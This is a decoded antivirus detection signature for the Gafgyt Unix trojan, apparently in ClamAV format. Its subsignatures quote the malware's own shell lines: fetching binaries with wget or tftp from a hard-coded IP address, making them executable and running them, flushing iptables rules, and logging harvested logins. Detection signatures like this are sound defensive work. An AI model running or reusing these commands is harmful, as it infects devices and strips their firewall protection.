VIRUS NAME: Unix.Trojan.Gafgyt-6981166-0
TDB: Engine:51-255,Target:6
LOGICAL EXPRESSION: (0|1|2)&(3&4)
 * SUBSIG ID 0
 +-> OFFSET: ANY
 +-> SIGMOD: NONE
 +-> DECODED SUBSIGNATURE:
cd /var/; rm -rf mipsel; wget http://5.206.225.25/bins.sh;http://5.206.225.25/bin.sh || tftp -r bin.sh -g 5.206.225.25;tftp -r 
 * SUBSIG ID 1
 +-> OFFSET: ANY
 +-> SIGMOD: NONE
 +-> DECODED SUBSIGNATURE:
cd /var/; rm -rf mipsel; wget http://5.206.225.25/mipsel || tftp -r mipsel -g 5.206.225.25; chmod 777 mipsel; ./mipsel; rm -rf 
 * SUBSIG ID 2
 +-> OFFSET: ANY
 +-> SIGMOD: NONE
 +-> DECODED SUBSIGNATURE:
LOGIN FOUND - %s:%s:%s
 * SUBSIG ID 3
 +-> OFFSET: ANY
 +-> SIGMOD: NONE
 +-> DECODED SUBSIGNATURE:
bins.sh -g 5.206.225.25; chmod 777 mipsel; ./bins;./bin; rm -rf bins.sh;rm -rf bin.sh
 * SUBSIG ID 4
 +-> OFFSET: ANY
 +-> SIGMOD: NONE
 +-> DECODED SUBSIGNATURE:
/sbin/iptables -F;/sbin/iptables -X
